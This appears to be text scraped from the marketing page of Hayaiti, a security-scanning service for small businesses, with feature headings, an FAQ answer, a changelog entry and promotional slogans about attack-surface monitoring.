Hayaiti now reads Access policies, Gateway rules, and WARP client posture. Writes findings back as risk signals your Access rules can react to.

Feb 06

v4.13.1•Platform

Evidence pack builder supports 710 controls

Added ISO 42001 (AI management), NIS2, and the NYDFS cybersecurity amendment. Mapping is auto-maintained as frameworks evolve.

View full changelog

FAQ · Twelve answers, zero fluff

The objections we’ve heard a thousand times.

We wrote these the way we’d answer them on a call — direct, specific, and without the “it depends” hedging. Filter by topic or scroll the whole list.

Those were built for Fortune 500 SOCs with 40-person security teams and $2M budgets. They charge per-asset, require a 6-week rollout, and bury findings under 4,000-line PDFs. Hayaiti was built for the 60% of the economy that has no SOC at all: one dev-ops person, one MSP, and a board asking where the cyber spend goes. We scan in 11 minutes, price flat, and ship findings in plain English with a 3-step fix. You can A/B us live — we'll do a free side-by-side scan on any asset you own.

Still have questions?

Book a 20-minute call with an engineer.

No BDR script. No slide deck. Just the answer you need.

Email the team Book a call →

Don’t Wait for a Breach

98% of businesses we scan have critical vulnerabilities. Find yours before attackers do — start your free assessment now.

Free scan · Results in minutes · No credit card required · Every customer insured

Stopransomwarehackersbefore they win.

From domain to full report in under 15 minutes.

Enter Domain & Verify

Active Surface Scan

Receive Actionable Report

Plays nice with the tools you already use.

Watch us tear apart a real domain.

Every weakness — ranked, explained, and ready to fix.

External Attack Surface

Your attack surface visualized.

The whole product, in six clicks.

Point and scan.

From discovery to closed in under 5 hours.

Slack alert fires with context

41,287 CVEs published last year. We tracked all of them.

We find the same vectors real attackers use.

Leaked Credentials

Email Spoofing Vectors

Weak TLS & Certificate Issues

Exposed Services & Subdomains

Known CVEs in Public Stack

Compliance & Privacy Gaps

Want to see your domain the way an attacker does?

Open ports

Leaked credentials

Exposed files

Subdomain takeover candidates

Phishing domain twins

94,000 attackshappen every minute.

The internet is a war zone. We watch every front.

Where Hayaiti sits in your stack.

Six dimensions of risk. One brutal truth.

Where your industry is bleeding right now.

How a real breach happens in 5 stages.

Attacker maps your attack surface

Attacker finds the soft spot

Attacker walks through the door

Attacker spreads through your network

Attacker leaves with your data

Coverage across 12 attack tactics — verified.

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command & Control

Exfiltration

Impact

The platform that never sleeps.

CVE-2026-3127

Are you exposed?

Cybersecurity is broken.We’re the fix.

If you can’t explain it, don’t ship it.

The report isn’t the product.

SMBs deserve Fortune 500 defense.

Price is a feature.

Speed is safety.

False positives are a bug.

The scanner is not the moat.

Trust is earned by audit, not assertion.

From signup to SOC 2 evidence in 90 days.

You scan

First report lands

Remediation review

Continuous monitoring

Audit-ready

Every CVE.Cross-referenced to your stack.

0-day enrichment in < 4 hours

CISA-KEV priority alerting

Stack-aware filtering

A 42-page report your CFO, CISO, and auditor will all read.

See a real anonymized report

Executive Summary

Risk Posture Scorecard

Stop
hackers
before they win.

94,000 attacks
happen every minute.

Cybersecurity is broken.
We’re the fix.

Every CVE.
Cross-referenced to your stack.

Priced like software.
Not like a sales gauntlet.